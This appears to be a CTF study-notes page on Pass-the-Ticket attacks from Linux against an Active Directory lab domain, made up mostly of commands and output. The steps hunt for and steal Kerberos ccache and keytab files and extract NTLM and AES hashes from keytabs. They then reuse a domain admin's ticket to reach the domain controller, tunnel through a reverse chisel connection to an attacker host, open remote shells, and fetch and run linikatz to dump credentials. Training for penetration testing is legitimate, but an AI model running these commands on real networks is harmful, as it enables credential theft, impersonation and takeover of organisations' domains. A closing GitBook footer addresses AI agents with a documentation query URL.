> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-ticket-from-linux-ptt.md).

# Pass the Ticket from Linux(PtT)

## Pass the Ticket (PtT) from Linux

### Overview

Linux machines connected to Active Directory use Kerberos for authentication. If you compromise one, you can steal Kerberos tickets and impersonate other users — no password needed.

> **Note:** A Linux machine does NOT need to be domain-joined to use Kerberos tickets. Tickets can be used in scripts or for network auth on any Linux box with a Kerberos client installed.

***

### How Linux Stores Kerberos Tickets

Two storage methods exist on Linux:

| Type            | Purpose                       | Location                          | Lifetime                |
| --------------- | ----------------------------- | --------------------------------- | ----------------------- |
| **ccache file** | Active session credentials    | `/tmp/krb5cc_<UID>_<random>`      | Session-based (\~24hrs) |
| **keytab file** | Automated script/service auth | `/etc/krb5.keytab`, `/opt/`, etc. | Permanent until rotated |

#### ccache Files

* Holds TGT + service tickets for active user sessions
* Location stored in environment variable `KRB5CCNAME`
* Protected by `rw-------` (600) permissions — only owner or root can read
* Automatically created when user authenticates to domain

```bash
# Check your current ccache location
env | grep -i krb5
# KRB5CCNAME=FILE:/tmp/krb5cc_647402606_qd2Pfh
```

#### keytab Files

* Contains Kerberos principal + encrypted keys derived from the password
* Used by scripts/services to authenticate without a password prompt
* **Must be recreated every time the account password changes**
* Can be created on one machine and copied to another — not system-restricted

> **Note:** To use a keytab file, you need read AND write (`rw`) permissions on it.

***

### Step 1 — Identify if Linux Machine is Domain-Joined

#### Method 1: `realm`

```bash
realm list
```

**Output:**

```
inlanefreight.htb
  type: kerberos
  realm-name: INLANEFREIGHT.HTB
  domain-name: inlanefreight.htb
  configured: kerberos-member
  server-software: active-directory
  client-software: sssd
  login-formats: %U@inlanefreight.htb
  login-policy: allow-permitted-logins
  permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
  permitted-groups: Linux Admins
```

**What to look for:**

* `type: kerberos` or `type: active-directory`
* `configured: kerberos-member`
* Permitted users and groups — these are your targets

#### Method 2: Check for AD Integration Services

```bash
ps -ef | grep -i "winbind\|sssd"
```

**Common services indicating domain join:**

* `sssd` — System Security Services Daemon (most common)
* `winbind` — part of Samba stack

***

### Step 2 — Find Kerberos Tickets

#### Finding KeyTab Files

**Search by name**

```bash
find / -name *keytab* -ls 2>/dev/null
```

**Example output:**

```
131610  4 -rw-------  1 root  root  1348 Oct  4 16:26 /etc/krb5.keytab
262169  4 -rw-rw-rw-  1 root  root   216 Oct 12 15:13 /opt/specialfiles/carlos.keytab
```

**Common locations:**

* `/etc/krb5.keytab` — machine account ticket (root only)
* `/home/user/.keytab` — user personal keytab
* `/opt/specialfiles/*.keytab` — shared service keytabs

**Search in cron jobs (keytabs without `.keytab` extension)**

```bash
crontab -l
cat /home/user/.scripts/somescript.sh
```

**Example cron script revealing a keytab:**

```bash
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass
```

> **Note:** If you find `/etc/krb5.keytab` and gain root, you can impersonate the machine account `LINUX01$.INLANEFREIGHT.HTB`

#### Finding ccache Files

```bash
# Check env variable
env | grep -i krb5

# List all ccache files in /tmp
ls -la /tmp
```

**Example output:**

```
-rw-------  1 julio@inlanefreight.htb   domain users  1406 Oct  6 16:38 krb5cc_647401106_tBswau
-rw-------  1 david@inlanefreight.htb   domain users  1406 Oct  6 15:23 krb5cc_647401107_Gf415d
-rw-------  1 carlos@inlanefreight.htb  domain users  1433 Oct  6 15:43 krb5cc_647402606_qd2Pfh
```

> **Requires root or elevated privileges to read other users' ccache files**

***

### Step 3a — Abuse KeyTab Files

#### Method 1: Impersonate User with `kinit`

**Step 1: Check which user the keytab belongs to**

```bash
klist -k -t /opt/specialfiles/carlos.keytab
```

**Output:**

```
Keytab name: FILE:/opt/specialfiles/carlos.keytab
KVNO Timestamp           Principal
---- ------------------- ----------------------------------------
   1 10/06/2022 17:09:13 carlos@INLANEFREIGHT.HTB
```

**Step 2: Check your current ticket**

```bash
klist
# Default principal: david@INLANEFREIGHT.HTB
```

**Step 3: Import keytab into your session**

```bash
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
```

> **Note:** `kinit` is case-sensitive — use the principal name exactly as shown in `klist` output (lowercase username, uppercase domain)

**Step 4: Verify impersonation**

```bash
klist
# Default principal: carlos@INLANEFREIGHT.HTB  ← you're now Carlos
```

**Step 5: Use the ticket**

```bash
smbclient //dc01/carlos -k -c ls
```

> **Tip:** Before importing a keytab, save a copy of your current ccache file if you want to switch back:
>
> ```bash
> cp $KRB5CCNAME /tmp/backup_ticket
> ```

***

#### Method 2: Extract Hashes from KeyTab (Password Cracking)

Keytab files contain encrypted key material. You can extract NTLM and AES hashes and crack them.

**Extract hashes:**

```bash
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
```

**Output:**

```
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : INLANEFREIGHT.HTB
        SERVICE PRINCIPAL : carlos/
        NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
        AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
        AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
```

**Crack options:**

* NTLM hash → Hashcat, John the Ripper, or crackstation.net (fastest)
* AES256/AES128 → Use with Rubeus to forge tickets, or crack for plaintext

**Log in with cracked password:**

```bash
su - carlos@inlanefreight.htb
# Password: Password5
```

> **Note:** A keytab file can contain multiple users' credentials merged together.

***

### Step 3b — Abuse ccache Files

Requires root access on the machine.

#### Full Attack Chain: ccache → Domain Admin

**Step 1: Escalate to root**

```bash
# If svc_workstations has sudo ALL:
sudo -l
sudo su
whoami  # root
```

**Step 2: List ccache files and identify high-value targets**

```bash
ls -la /tmp
```

**Step 3: Identify the target user's group membership**

```bash
id julio@inlanefreight.htb
# groups: domain admins@inlanefreight.htb  ← jackpot
```

**Step 4: Import the ccache ticket**

```bash
cp /tmp/krb5cc_647401106_HRJDux .
export KRB5CCNAME=/root/krb5cc_647401106_HRJDux
```

**Step 5: Verify the ticket**

```bash
klist
# Default principal: julio@INLANEFREIGHT.HTB
# Valid starting: 10/07/2022 13:25:01
# Expires:        10/07/2022 23:25:01   ← check this isn't expired
```

**Step 6: Access DC resources**

```bash
smbclient //dc01/C$ -k -c ls -no-pass
# Full C: drive of Domain Controller — you're in
```

> **Important:** Check the `Valid starting` and `Expires` timestamps. Expired ccache tickets are useless.

***

### Step 4 — Use Stolen Tickets with Attack Tools (From External Host)

If attacking from a machine **not** on the domain, you need to tunnel traffic first.

#### Setup: Proxychains + Chisel Tunnel

**Step 1: Configure `/etc/hosts`**

```bash
cat /etc/hosts
# 172.16.1.10  inlanefreight.htb  dc01.inlanefreight.htb  dc01
# 172.16.1.5   ms01.inlanefreight.htb  ms01
```

**Step 2: Configure `/etc/proxychains.conf`**

```
[ProxyList]
socks5 127.0.0.1 1080
```

**Step 3: Start Chisel server on attack host**

```bash
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
gzip -d chisel_1.7.7_linux_amd64.gz
mv chisel_* chisel && chmod +x ./chisel
sudo ./chisel server --reverse
```

**Step 4: Connect Chisel client on MS01 (Windows)**

```cmd
c:\tools\chisel.exe client 10.10.14.33:8080 R:socks
```

**Step 5: Set the stolen ticket**

```bash
export KRB5CCNAME=/home/htb-student/krb5cc_647401106_I8I133
```

***

#### Tool 1: Impacket

```bash
proxychains impacket-wmiexec dc01 -k
# C:\> whoami
# inlanefreight\julio
```

> **Note:** Use machine hostname (`dc01`), NOT the IP address. Use `-no-pass` if prompted for password.

> **Note:** If on a domain-joined Linux machine, strip `FILE:` prefix from `KRB5CCNAME`:
>
> ```bash
> export KRB5CCNAME=/tmp/krb5cc_647401106_HRJDux  # no FILE: prefix
> ```

***

#### Tool 2: Evil-WinRM

**Step 1: Install Kerberos package**

```bash
sudo apt-get install krb5-user -y
# When prompted:
# Default realm: INLANEFREIGHT.HTB
# KDC: DC01
```

**Step 2: Configure `/etc/krb5.conf`**

```ini
[libdefaults]
        default_realm = INLANEFREIGHT.HTB

[realms]
    INLANEFREIGHT.HTB = {
        kdc = dc01.inlanefreight.htb
    }
```

**Step 3: Connect**

```bash
proxychains evil-winrm -i dc01 -r inlanefreight.htb
# *Evil-WinRM* PS C:\Users\julio\Documents> whoami
# inlanefreight\julio
```

***

### Ticket Conversion — Linux ↔ Windows

Convert ccache (Linux) to kirbi (Windows) and vice versa using Impacket.

#### Linux ccache → Windows kirbi

```bash
impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbi
# [*] converting ccache to kirbi...
# [+] done
```

#### Use kirbi on Windows with Rubeus

```cmd
C:\tools\Rubeus.exe ptt /ticket:c:\tools\julio.kirbi
# [+] Ticket successfully imported!

klist
# Client: julio @ INLANEFREIGHT.HTB

dir \\dc01\julio
# Successfully lists directory as Julio
```

#### Windows kirbi → Linux ccache

```bash
impacket-ticketConverter julio.kirbi krb5cc_julio
export KRB5CCNAME=/root/krb5cc_julio
```

***

### Linikatz — Automated Credential Extraction

Linikatz is the Linux equivalent of Mimikatz. It automatically extracts all Kerberos credentials from SSSD, FreeIPA, Samba, Vintella, PBIS, and more.

**Requires root.**

```bash
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
chmod +x linikatz.sh
/opt/linikatz.sh
```

**What it finds:**

* All ccache files (user and machine tickets)
* All keytab files
* Cached hashes from SSSD
* Samba machine secrets and hashes
* KCM Kerberos tickets

**Output location:** Creates a folder named `linikatz.<random>` with all extracted credentials in ccache and keytab formats — ready to use directly.

***

### Full Attack Path Summary

```
1. SSH into compromised Linux machine (domain-joined)
   ↓
2. realm list / ps -ef | grep sssd  →  Confirm domain join
   ↓
3. find / -name *keytab* / ls /tmp  →  Find tickets
   ↓
4a. KEYTAB PATH:
    klist -k -t <file>              →  Identify principal
    kinit user@DOMAIN -k -t <file>  →  Import ticket
    OR
    keytabextract.py <file>         →  Extract NTLM hash → crack → su - user
   ↓
4b. CCACHE PATH (needs root):
    sudo su                         →  Get root
    id target@domain                →  Check if Domain Admin
    cp /tmp/krb5cc_* .              →  Copy their ticket
    export KRB5CCNAME=<path>        →  Load ticket
   ↓
5. smbclient //dc01/C$ -k          →  Access DC
   OR
   impacket-wmiexec dc01 -k        →  Shell on DC
   OR
   evil-winrm -i dc01 -r DOMAIN    →  WinRM shell on DC
   ↓
6. OPTIONAL: impacket-ticketConverter → use on Windows with Rubeus
   OPTIONAL: linikatz.sh           → dump everything at once
```

***

### Quick Reference — All Commands

```bash
# Identify domain join
realm list
ps -ef | grep -i "winbind\|sssd"

# Find tickets
find / -name *keytab* -ls 2>/dev/null
ls -la /tmp
env | grep -i krb5
crontab -l

# Inspect tickets
klist                                         # current session ticket
klist -k -t /path/to/file.keytab             # inspect keytab

# Impersonate via keytab
kinit user@DOMAIN.HTB -k -t /path/to/file.keytab
klist                                         # verify

# Extract hashes from keytab
python3 keytabextract.py /path/to/file.keytab

# Use ccache ticket
cp /tmp/krb5cc_XXXXXXX /root/
export KRB5CCNAME=/root/krb5cc_XXXXXXX
klist

# Access resources
smbclient //dc01/share -k -c ls
smbclient //dc01/C$ -k -c ls -no-pass

# Impacket with Kerberos
export KRB5CCNAME=/path/to/ticket
proxychains impacket-wmiexec dc01 -k -no-pass

# Evil-WinRM with Kerberos
proxychains evil-winrm -i dc01 -r INLANEFREIGHT.HTB

# Ticket conversion
impacket-ticketConverter krb5cc_file output.kirbi    # Linux → Windows
impacket-ticketConverter file.kirbi output_ccache    # Windows → Linux

# Linikatz (automated dump, needs root)
/opt/linikatz.sh
```

***

### Non-Domain-Joined Linux with Kerberos

A Linux machine does **NOT** need to be formally domain-joined to have Kerberos tickets.

**Scenario:** A standalone Linux server runs backup scripts that authenticate to a Windows file share using a Kerberos keytab.

#### Detection

```bash
# Domain-joined machines will return output:/co
realm list  → output
ps -ef | grep sssd  → output

# Non-domain-joined standalone Kerberos machines return NOTHING above
# But look for:
which kinit
which klist
find / -name *keytab* -ls 2>/dev/null
grep -r "kinit" /home /opt /var/scripts 2>/dev/null
```

```bash
find / -name *keytab* -ls 2>/dev/null
klist -k -t /opt/backup.keytab
kinit svc_backup@INLANEFREIGHT.HTB -k -t /opt/backup.keytab
smbclient //dc01/backup$ -k -c ls
```

### Key Notes

> Always use **hostname not IP** with Kerberos tools — tickets are bound to hostnames

> Always check `klist` expiry time — expired ticket = wasted time

> `kinit` is **case-sensitive** — match principal exactly as shown in `klist -k -t`

> If `KRB5CCNAME` has `FILE:` prefix on domain-joined Linux, strip it before using Impacket

> ccache files are temporary — act fast, they expire in \~24hrs

> keytab → `kinit` impersonates user in current shell only. Won't affect other sessions.

> `svc_workstations` having `sudo ALL` → `sudo su` → root → access all ccache files is a very common CPTS-style chain


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-ticket-from-linux-ptt.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
